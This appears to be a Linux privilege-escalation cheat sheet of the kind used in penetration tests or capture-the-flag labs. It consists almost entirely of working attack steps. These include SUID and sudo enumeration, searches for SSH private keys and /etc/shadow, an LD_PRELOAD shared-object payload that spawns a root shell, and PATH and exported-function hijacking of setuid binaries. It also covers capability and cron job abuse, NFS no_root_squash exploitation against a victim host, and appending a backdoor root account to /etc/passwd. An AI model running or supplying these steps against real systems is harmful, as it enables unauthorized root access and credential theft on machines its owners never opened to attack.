🐧Linux

sudo -l # View sudo perms.

If you see that you have sudo perms to run something as another user.
Use sudo *otheruser* command.

find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null

If /bin/bash has a sticky bit set you can use /bin/bash -p for a privileged shell.

find . -writable
find / -type d -writable -print # Find writable files include full path

/home/user/myvpn.ovpn
/etc/openvpn/auth.txt
/home/user/.irssi/config
~/.bash_history

These are files that if they have weak permissions may be exploitable.
/etc/shadow # For getting password hashes
/etc/sudoers

# Make sure id_rsa perms are changed to 400 if you want to use them.
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null # Lists id_rsa keys that are readable.

sudo apache2 -f /etc/shadow # Using apache permissions to read files.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

find / -type f -perm -04000 -ls 2>/dev/null # Note the stickies binaries.
strings /usr/local/bin/suid-env # Note functions used by binary

Notice this suid-env had the "system" function in it

#Exploit Method 1 - Using "system" function
Make the exploit file to be compiled. 
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
Compile it
gcc /tmp/service.c -o /tmp/service
Export path
export PATH=/tmp:$PATH
Run binary
/usr/local/bin/suid-env

In this binary /usr/sbin/service was used in a stickied binary.
#Exploit Method 2 - using /usr/sbin/service
Make the function
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
Export function to shell
export -f /usr/sbin/service # -f indicates that you are exporting a function

Example if python capability is set to cap_setuid+ep
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

cat /etc/crontab # Check for any jobs that might be running scripts
#If you can edit a cron job you can echo in your command.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> script.sh
#You would then run bash from tmp where you just copied it to.
/tmp/bash -p

cat /etc/exports # Look for "no_root_squash" option

#List mountable folders
showmount -e VictimIP
#Make folder in tmp.
mkdir /tmp/mounted
#Mount the folder.
mount -o rw,vers=2 VictimIP:/tmp /tmp/mounted
#Echo your exploit code to the mounted folder.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mounted/x.c
#Compile code with gcc
gcc /tmp/mounted/x.c -o /tmp/mounted/x
#Change perms for binary
chmod +s /tmp/mounted/x

Run the Binary on the victim machine for privilege escalation.

openssl passwd -1 -salt password password 

echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd